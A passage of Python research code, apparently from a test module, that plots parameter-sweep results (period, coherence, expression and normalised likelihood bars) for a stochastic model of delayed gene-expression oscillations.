parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_' + parameter_name + '.npy'))
other_accepted_indices = np.where(my_parameter_sweep_results[:,9,3]<300)
my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
# a range of alternative sample selections (coherence or period changes at the
# lowered and raised sweep points) were explored here; only the reference
# period cut above is applied
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
this_axis.set_ylim(0,1)
# this_axis.set_ylim(0,0.5)
# this_axis.set_ylim(0,0.25)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_relative_sweep_for_nancy_' + parameter_name + '.pdf'))
def xest_plot_bayes_factor_differences(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_narrowed')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
number_of_absolute_samples = len(accepted_indices[0])
parameter_names = [ 'basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'Transcription rate'
x_labels['translation_rate'] = 'Translation rate'
x_labels['repression_threshold'] = 'Repression threshold'
x_labels['time_delay'] = 'Transcription delay'
x_labels['mRNA_degradation_rate'] = 'mRNA degradation'
x_labels['protein_degradation_rate'] = 'Protein degradation'
x_labels['hill_coefficient'] = 'Hill coefficient'
for plotting_option in ['boxes', 'samples_only']:
statistic_names = [ 'basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'hill_coefficient' ]
my_figure = plt.figure( figsize = (4.5, 7.5) )
decrease_ratios = dict()
increase_ratios = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'narrowed_relative_sweeps_' +
parameter_name + '.npy'))
number_of_absolute_samples = len(np.where(np.logical_or(my_parameter_sweep_results[:,9,3] > 600,
my_parameter_sweep_results[:,9,4] < 0.05))[0])
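# the denominator counts samples that miss the target behaviour at the
# reference sweep point (period above 600 minutes or coherence below 0.05);
# the ratios below measure how often lowering (point 4) or raising (point 14)
# the parameter produces a short-period, coherent oscillation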
decrease_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.05,
my_parameter_sweep_results[:,9,3] > 600),
np.logical_and(my_parameter_sweep_results[:,4,3] < 300,
my_parameter_sweep_results[:,4,4] > 0.1)))
decrease_ratios[parameter_name] = len(decrease_indices[0])/float(number_of_absolute_samples)
increase_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.05,
my_parameter_sweep_results[:,9,3] > 600),
np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
my_parameter_sweep_results[:,14,4] > 0.1)))
increase_ratios[parameter_name] = len(increase_indices[0])/float(number_of_absolute_samples)
increase_bars = [increase_ratios[parameter_name] for parameter_name
in parameter_names]
decrease_bars = [decrease_ratios[parameter_name] for parameter_name
in parameter_names]
increase_positions = np.arange(len(increase_bars))
decrease_positions = np.arange(len(decrease_bars)) + len(increase_bars)
all_positions = np.hstack((increase_positions, decrease_positions))
all_bars = np.array( increase_bars + decrease_bars)
labels_up = [x_labels[parameter_name] + ' up' for parameter_name in parameter_names]
labels_down = [x_labels[parameter_name] + ' down' for parameter_name in parameter_names]
all_labels = labels_up + labels_down
sorting_indices = np.argsort(all_bars)
sorted_labels = [all_labels[sorting_index] for
sorting_index in sorting_indices]
sorted_bars = np.sort(all_bars)
# sorted_bars = -np.log(sorted_bars)
sorted_bars/= np.sum(sorted_bars)
sorted_bars = sorted_bars[::-1]
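# normalise so the bar heights sum to one and plot the largest bar first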
my_figure.add_subplot(611)
plt.bar(all_positions, sorted_bars)
sorted_labels.reverse()
plt.xticks( all_positions + 0.4 ,
sorted_labels,
rotation = 30,
fontsize = 3,
horizontalalignment = 'right')
plt.xlim(all_positions[0] - 0.5,)
plt.gca().locator_params(axis='y', tight = True, nbins=5)
plt.ylim(0,sorted_bars[0]*1.2)
plt.ylabel('Likelihood')
x_positions = dict()
for index, position in enumerate(all_positions):
x_positions[sorted_labels[index]] = position
for statistic_index, statistic_name in enumerate(statistic_names):
statistic_values = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'narrowed_relative_sweeps_' +
parameter_name + '.npy'))
number_of_absolute_samples = len(np.where(np.logical_or(my_parameter_sweep_results[:,9,3] > 600,
my_parameter_sweep_results[:,9,4] < 0.05))[0])
decrease_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.05,
my_parameter_sweep_results[:,9,3] > 600),
np.logical_and(my_parameter_sweep_results[:,4,3] < 300,
my_parameter_sweep_results[:,4,4] > 0.1)))
decrease_statistic_values = my_posterior_samples[decrease_indices, statistic_index]
statistic_values[x_labels[parameter_name] + ' down'] = decrease_statistic_values
increase_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.05,
my_parameter_sweep_results[:,9,3] > 600),
np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
my_parameter_sweep_results[:,14,4] > 0.1)))
increase_statistic_values = my_posterior_samples[increase_indices, statistic_index]
statistic_values[x_labels[parameter_name] + ' up'] = increase_statistic_values
my_figure.add_subplot(6,1,statistic_index + 2)
# loop through all parameters up and down combinations
for label in sorted_labels:
# get x position and statistic values
this_x_position = x_positions[label]
these_statistic_values = statistic_values[label]
# make x values
these_x_positions = this_x_position - 0.2 + 0.4*np.random.rand(len(these_statistic_values.flatten()))
if statistic_name.startswith('repression_threshold'):
these_statistic_values/=10000
# scatter
if plotting_option == 'samples_only':
plt.scatter(these_x_positions, these_statistic_values,
marker = '.', lw = 0, color = 'dimgrey',
# alpha = 0.1,
s = 1,
zorder = 0)
elif plotting_option == 'boxes':
plt.boxplot(these_statistic_values, positions = [this_x_position],
sym = '', widths = [0.7])
plt.gca().set_rasterization_zorder(1)
if statistic_name.startswith('translation_rate') or statistic_name.startswith('basal_transcription_rate'):
plt.gca().set_yscale("log")
else:
plt.gca().locator_params(axis='y', tight = True, nbins=5)
# plt.gca().xaxis.set_ticks([])
# plt.gca().xaxis.set_ticklabels([])
plt.xticks( all_positions,
sorted_labels,
rotation = 30,
fontsize = 3,
horizontalalignment = 'right')
plt.xlim(all_positions[0] - 0.5,)
# plt.ylim(0,sorted_bars[-1]*1.2)
plt.ylabel(x_labels[statistic_name], fontsize = 5)
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output',
'likelihood_plot_extension_' + plotting_option + '.pdf'), dpi = 400)
for reference_point in ['start', 'end']:
my_figure = plt.figure( figsize = (4.5, 7.5) )
if reference_point == 'start':
statistic_names = ['Expression', 'rel. std.', 'Period', 'Coherence', '<mRNA>']
else:
statistic_names = ['Expression', 'rel. std.', 'Period', 'Coherence']
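# at the 'start' reference the statistics are read from accepted_model_results;
# at the 'end' they come from the sweep table, offset by one because column 0
# there holds the relative parameter value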
for statistic_index, statistic_name in enumerate(statistic_names):
statistic_values = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'narrowed_relative_sweeps_' +
parameter_name + '.npy'))
number_of_absolute_samples = len(np.where(np.logical_or(my_parameter_sweep_results[:,9,3] > 600,
my_parameter_sweep_results[:,9,4] < 0.05))[0])
decrease_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.05,
my_parameter_sweep_results[:,9,3] > 600),
np.logical_and(my_parameter_sweep_results[:,4,3] < 300,
my_parameter_sweep_results[:,4,4] > 0.1)))
if reference_point == 'start':
decrease_statistic_values = accepted_model_results[decrease_indices, statistic_index]
elif reference_point == 'end':
decrease_statistic_values = my_parameter_sweep_results[decrease_indices, 4, statistic_index+1]
statistic_values[x_labels[parameter_name] + ' down'] = decrease_statistic_values
increase_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.05,
my_parameter_sweep_results[:,9,3] > 600),
np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
my_parameter_sweep_results[:,14,4] > 0.1)))
if reference_point == 'start':
increase_statistic_values = accepted_model_results[increase_indices, statistic_index]
elif reference_point == 'end':
increase_statistic_values = my_parameter_sweep_results[increase_indices, 14, statistic_index+1]
statistic_values[x_labels[parameter_name] + ' up'] = increase_statistic_values
my_figure.add_subplot(5,1,statistic_index + 1)
# loop through all parameters up and down combinations
for label in sorted_labels:
# get x position and statistic values
this_x_position = x_positions[label]
these_statistic_values = statistic_values[label]
# make x values
these_x_positions = this_x_position - 0.2 + 0.4*np.random.rand(len(these_statistic_values.flatten()))
# scatter
if statistic_name.startswith('Expression'):
these_statistic_values/=10000
if plotting_option == 'samples_only':
plt.scatter(these_x_positions, these_statistic_values,
marker = '.', lw = 0, color = 'dimgrey',
# alpha = 0.1,
s = 1,
zorder = 0)
elif plotting_option == 'boxes':
plt.boxplot(these_statistic_values, positions = [this_x_position],
sym = '', widths = [0.7])
plt.gca().set_rasterization_zorder(1)
# (a fixed period axis of 200 to 350 minutes was trialled for the period panel)
plt.gca().locator_params(axis='y', tight = True, nbins=5)
# plt.gca().xaxis.set_ticks([])
# plt.gca().xaxis.set_ticklabels([])
plt.xticks( all_positions,
sorted_labels,
rotation = 30,
fontsize = 3,
horizontalalignment = 'right')
plt.xlim(all_positions[0] - 0.5,)
# plt.ylim(0,sorted_bars[-1]*1.2)
plt.ylabel(statistic_name, fontsize = 5)
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output',
'likelihood_plot_extension_' + plotting_option + '_' + reference_point + '.pdf'), dpi = 400)
def xest_plot_bayes_factors_for_models(self):
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
sns.set()
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05))))
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
new_accepted_indices = np.where(my_posterior_samples[:,1]<10)
number_of_absolute_samples = len(accepted_indices[0])
print('the base model accepted this many samples:')
print(number_of_absolute_samples)
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'Transcription rate'
x_labels['translation_rate'] = 'Translation rate'
x_labels['repression_threshold'] = 'Repression threshold'
x_labels['time_delay'] = 'Transcription delay'
x_labels['mRNA_degradation_rate'] = 'mRNA degradation'
x_labels['protein_degradation_rate'] = 'Protein degradation'
x_labels['hill_coefficient'] = 'Hill coefficient'
reference_parameters = dict()
decrease_ratios = dict()
increase_ratios = dict()
bardata = []
## Increase in coherence
for parameter_name in parameter_names:
print('investigating ' + parameter_name)
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_' +
parameter_name + '.npy'))
print('using ' + str(number_of_absolute_samples) + ' accepted base samples')
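# fraction of samples whose reference coherence is below 0.1 but whose
# coherence at the lowered sweep point exceeds 0.1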
decrease_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
my_parameter_sweep_results[:,4,4] > 0.1))
# decrease_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,3] > 1000,
# my_parameter_sweep_results[:,4,3] < 300))
decrease_ratios[parameter_name] = len(decrease_indices[0])/float(number_of_absolute_samples)
increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
my_parameter_sweep_results[:,14,4] > 0.1))
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,3] > 1000,
# my_parameter_sweep_results[:,14,3] < 300))
increase_ratios[parameter_name] = len(increase_indices[0])/float(number_of_absolute_samples)
increase_bars = [increase_ratios[parameter_name] for parameter_name
in parameter_names]
decrease_bars = [decrease_ratios[parameter_name] for parameter_name
in parameter_names]
increase_positions = np.arange(len(increase_bars))
decrease_positions = np.arange(len(decrease_bars)) + len(increase_bars)
all_positions = np.hstack((increase_positions, decrease_positions))
all_bars = np.array( increase_bars + decrease_bars)
labels_up = [x_labels[parameter_name] + ' up' for parameter_name in parameter_names]
labels_down = [x_labels[parameter_name] + ' down' for parameter_name in parameter_names]
all_labels = labels_up + labels_down
sorting_indices = np.argsort(all_bars)
sorted_labels = [all_labels[sorting_index] for
sorting_index in sorting_indices]
sorted_bars = np.sort(all_bars)
sorted_bars/= np.sum(sorted_bars)
my_figure = plt.figure( figsize = (4.5, 1.5) )
plt.bar(all_positions, sorted_bars[::-1])
sorted_labels.reverse()
plt.xticks( all_positions + 0.4 ,
sorted_labels,
rotation = 30,
fontsize = 3,
horizontalalignment = 'right')
plt.xlim(all_positions[0] - 0.5,)
plt.gca().locator_params(axis='y', tight = True, nbins=5)
plt.ylabel('Likelihood')
plt.ylim(0,sorted_bars[-1]*1.2)
# plt.ylim(0,1)
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output',
'likelihood_plot_coherence_increase_from_0.1.pdf'))
## Period decrease with coherence above 0.1
for parameter_name in parameter_names:
print('investigating ' + parameter_name)
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_' +
parameter_name + '.npy'))
# my_reducing_indices = np.where(my_posterior_samples[:,0]<13)
# my_parameter_sweep_results = my_parameter_sweep_results[new_accepted_indices]
print('these accepted base samples are')
number_of_absolute_samples = len(np.where(np.logical_or(my_parameter_sweep_results[:,9,3] > 600,
my_parameter_sweep_results[:,9,4] < 0.1))[0])
print(number_of_absolute_samples)
# (weaker decrease criteria were tried here)
decrease_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.1,
my_parameter_sweep_results[:,9,3] > 600),
np.logical_and(my_parameter_sweep_results[:,4,3] < 300,
my_parameter_sweep_results[:,4,4] > 0.1)))
decrease_ratios[parameter_name] = len(decrease_indices[0])/float(number_of_absolute_samples)
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,3] > 600,
increase_indices = np.where(np.logical_and(np.logical_or(my_parameter_sweep_results[:,9,4] < 0.1,
my_parameter_sweep_results[:,9,3] > 600),
np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
my_parameter_sweep_results[:,14,4] > 0.1)))
# increase_indices = np.where(np.logical_and( my_parameter_sweep_results[:,9,3] < 0.2,
# np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
# my_parameter_sweep_results[:,14,4] > 0.1)))
# np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
# np.logical_and(my_parameter_sweep_results[:,14,3] < 300,
# my_parameter_sweep_results[:,14,4] > 0.1)))
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,14,4] > 0.1))
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,3] > 1000,
# my_parameter_sweep_results[:,14,3] < 300))
increase_ratios[parameter_name] = len(increase_indices[0])/float(number_of_absolute_samples)
increase_bars = [increase_ratios[parameter_name] for parameter_name
in parameter_names]
decrease_bars = [decrease_ratios[parameter_name] for parameter_name
in parameter_names]
increase_positions = np.arange(len(increase_bars))
decrease_positions = np.arange(len(decrease_bars)) + len(increase_bars)
all_positions = np.hstack((increase_positions, decrease_positions))
all_bars = np.array( increase_bars + decrease_bars)
labels_up = [x_labels[parameter_name] + ' up' for parameter_name in parameter_names]
labels_down = [x_labels[parameter_name] + ' down' for parameter_name in parameter_names]
all_labels = labels_up + labels_down
sorting_indices = np.argsort(all_bars)
sorted_labels = [all_labels[sorting_index] for
sorting_index in sorting_indices]
sorted_bars = np.sort(all_bars)
# sorted_bars = -np.log(sorted_bars)
sorted_bars /= np.sum(sorted_bars) # normalise so the bars can be read as likelihoods
my_figure = plt.figure( figsize = (4.5, 1.5) )
plt.bar(all_positions, sorted_bars[::-1])
sorted_labels.reverse()
plt.xticks( all_positions + 0.4 ,
sorted_labels,
rotation = 30,
fontsize = 5,
horizontalalignment = 'right')
plt.xlim(all_positions[0] - 0.5,)
plt.gca().locator_params(axis='y', tight = True, nbins=5)
plt.ylim(0,sorted_bars[-1]*1.2)
plt.ylabel('Likelihood')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output',
'likelihood_plot_period_decrease_below_six_hours_and_coherence_above_0.1.pdf'))
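# The two likelihood figures above repeat the same assemble-normalise-sort-plot
# steps. Below is a minimal standalone sketch of that pattern (not part of the
# original test class; the function name and argument list are hypothetical).
# It sorts descending directly instead of sorting ascending and reversing,
# which is equivalent to the code above.
def plot_likelihood_bars_sketch(increase_ratios, decrease_ratios, x_labels,
                                parameter_names, filename):
    import numpy as np
    import matplotlib.pyplot as plt
    all_bars = np.array([increase_ratios[name] for name in parameter_names] +
                        [decrease_ratios[name] for name in parameter_names])
    all_labels = ([x_labels[name] + ' up' for name in parameter_names] +
                  [x_labels[name] + ' down' for name in parameter_names])
    sorting_indices = np.argsort(all_bars)[::-1] # largest ratio first
    sorted_bars = all_bars[sorting_indices]
    sorted_bars = sorted_bars/np.sum(sorted_bars) # normalise so bars sum to one
    sorted_labels = [all_labels[index] for index in sorting_indices]
    positions = np.arange(len(sorted_bars))
    figure = plt.figure(figsize = (4.5, 1.5))
    plt.bar(positions, sorted_bars)
    plt.xticks(positions + 0.4, sorted_labels, rotation = 30,
               fontsize = 5, horizontalalignment = 'right')
    plt.ylabel('Likelihood')
    figure.tight_layout()
    figure.savefig(filename)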
def xest_plot_relative_parameter_variation_coherence_increase_logarithmic(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'data','sampling_results_logarithmic')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
# other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
# my_posterior_samples = prior_samples[other_accepted_indices]
# model_results = model_results[other_accepted_indices]
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
# parameter_names = ['repression_threshold']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
reference_indices = dict()
reference_indices['basal_transcription_rate'] = 5
reference_indices['translation_rate'] = 5
reference_indices['repression_threshold'] = 5
reference_indices['time_delay'] = 15
# reference_indices['mRNA_degradation_rate'] = 15
reference_indices['mRNA_degradation_rate'] = 5
reference_indices['protein_degradation_rate'] = 15
reference_indices['hill_coefficient'] = 15
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'data',
'logarithmic_relative_sweeps_' + parameter_name + '.npy'))
# my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] <
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4],
# # my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] >
# my_parameter_sweep_results[:,9,4]*8,
# np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4] > 0.2))))
# # np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,3] < 400,
# # my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05))))
# # np.logical_and(my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05,
# # my_parameter_sweep_results[:,9,3] < 400)))))
increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
np.logical_or(my_parameter_sweep_results[:,4,4]>0.1,
my_parameter_sweep_results[:,14,4]>0.1)))
# my_parameter_sweep_results[:,
# np.logical_or(my_parameter_sweep_results[:,
# 4,
# 4] > 0.2,
# my_parameter_sweep_results[:,
# 14,
# 4] > 0.2)))
# np.logical_or(my_parameter_sweep_results[:,
# 4,
# 3] < 400,
# my_parameter_sweep_results[:,
# 14,
# 3] < 400)))
# 4] > 0.15))
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] >
# my_parameter_sweep_results[:,9,4]*8,
# np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4] > 0.2))))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,3] < 400,
# my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05))))
# np.logical_and(my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05,
# my_parameter_sweep_results[:,9,3] < 400)))))
my_parameter_sweep_results = my_parameter_sweep_results[increase_indices]
# my_sweep_parameters = my_posterior_samples[increase_indices]
my_figure = plt.figure( figsize = (6.5, 1.5) )
this_axis = my_figure.add_subplot(131)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,3], color ='black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Period [min]')
this_axis.set_ylim(0,700)
this_axis = my_figure.add_subplot(132)
for results_table in my_parameter_sweep_results:
this_axis.plot(results_table[:,0],
results_table[:,4], color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Coherence')
# this_axis.set_ylim(0,1)
# this_axis.set_ylim(0,0.5)
this_axis.set_ylim(0,0.4)
this_axis = my_figure.add_subplot(133)
for results_table in my_parameter_sweep_results:
this_axis.errorbar(results_table[:,0],
results_table[:,1]/10000,
yerr = results_table[:,2]/10000*results_table[:,1],
color = 'black', alpha = 0.05)
this_axis.locator_params(axis='x', tight = True, nbins=4)
this_axis.set_ylim(0,15)
this_axis.set_xlabel(x_labels[parameter_name])
this_axis.set_ylabel('Expression/1e4')
my_figure.tight_layout()
my_figure.savefig(os.path.join(os.path.dirname(__file__),
'output','logarithmic_relative_sweep_coherence_increases_large_' + parameter_name + '.pdf'))
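# A small self-contained sketch of the selection logic used in these sweep
# plots. The array layout is an assumption inferred from the indexing above:
# axis 0 indexes posterior samples, axis 1 the sweep points (index 9 is the
# unchanged parameter, indices 4 and 14 a decreased/increased value), and
# axis 2 the summary statistics (0: relative parameter value, 1: mean
# expression, 2: expression standard deviation, 3: period, 4: coherence).
def select_decrease_sweeps_sketch(sweep_results):
    import numpy as np
    # samples that are non-oscillatory at the reference point ...
    baseline_mask = np.logical_or(sweep_results[:,9,4] < 0.1,
                                  sweep_results[:,9,3] > 600)
    # ... and that gain a short period and visible coherence when the
    # parameter is lowered to index 4 of the sweep
    decrease_mask = np.logical_and(baseline_mask,
                                   np.logical_and(sweep_results[:,4,3] < 300,
                                                  sweep_results[:,4,4] > 0.1))
    return sweep_results[np.where(decrease_mask)]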
def xest_plot_relative_parameter_variation_coherence_increase_low_transcription(self):
# saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_all_parameters')
saving_path = os.path.join(os.path.dirname(__file__), 'output','sampling_results_hill_low_transcription')
model_results = np.load(saving_path + '.npy' )
prior_samples = np.load(saving_path + '_parameters.npy')
accepted_indices = np.where(np.logical_and(model_results[:,0]>55000, #cell number
np.logical_and(model_results[:,0]<65000, #cell_number
np.logical_and(model_results[:,1]<0.15, #standard deviation
model_results[:,1]>0.05)))) #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,1]>0.05, #standard deviation
# model_results[:,3]>0.3))))) #coherence
# np.logical_and(model_results[:,3]>0.3, #coherence
# prior_samples[:,3]>20))))) #time_delay
# prior_samples[:,0]<10))))) #transcription_rate
# prior_samples[:,3]>20)))))) #time_delay
my_posterior_samples = prior_samples[accepted_indices]
accepted_model_results = model_results[accepted_indices]
# other_accepted_indices = np.where(accepted_model_results[:,3] < 0.2)
# my_posterior_samples = prior_samples[other_accepted_indices]
# model_results = model_results[other_accepted_indices]
parameter_names = ['basal_transcription_rate',
'translation_rate',
'repression_threshold',
'time_delay',
'mRNA_degradation_rate',
'protein_degradation_rate',
'hill_coefficient']
# parameter_names = ['repression_threshold']
x_labels = dict()
x_labels['basal_transcription_rate'] = 'rel. Transcription rate'
x_labels['translation_rate'] = 'rel. Translation rate'
x_labels['repression_threshold'] = 'rel. Repression threshold'
x_labels['time_delay'] = 'rel. Transcription delay'
x_labels['mRNA_degradation_rate'] = 'rel. mRNA degradation'
x_labels['protein_degradation_rate'] = 'rel. Protein degradation'
x_labels['hill_coefficient'] = 'rel. Hill coefficient'
reference_indices = dict()
reference_indices['basal_transcription_rate'] = 5
reference_indices['translation_rate'] = 5
reference_indices['repression_threshold'] = 5
reference_indices['time_delay'] = 15
# reference_indices['mRNA_degradation_rate'] = 15
reference_indices['mRNA_degradation_rate'] = 5
reference_indices['protein_degradation_rate'] = 15
reference_indices['hill_coefficient'] = 15
parameter_indices = dict()
parameter_indices['basal_transcription_rate'] = 0
parameter_indices['translation_rate'] = 1
parameter_indices['repression_threshold'] = 2
parameter_indices['time_delay'] = 3
reference_parameters = dict()
for parameter_name in parameter_names:
my_parameter_sweep_results = np.load(os.path.join(os.path.dirname(__file__),
'output',
'hill_relative_sweeps_low_transcription' + parameter_name + '.npy'))
# my_parameter_sweep_results = my_parameter_sweep_results[other_accepted_indices]
# increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] <
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4],
# # my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] >
# my_parameter_sweep_results[:,9,4]*8,
# np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1 ,4] > 0.2))))
# # np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,3] < 400,
# # my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05))))
# # np.logical_and(my_parameter_sweep_results[:,20 - reference_indices[parameter_name] -1,4] < 0.05,
# # my_parameter_sweep_results[:,9,3] < 400)))))
increase_indices = np.where(np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
my_parameter_sweep_results[:,
reference_indices[parameter_name],
3] < 400))
# 4] > 0.15))
# my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] > 0.2))
# np.logical_and(my_parameter_sweep_results[:,reference_indices[parameter_name] -1,4] >
# my_parameter_sweep_results[:,9,4]*8,
# np.logical_and(my_parameter_sweep_results[:,9,4] < 0.1,
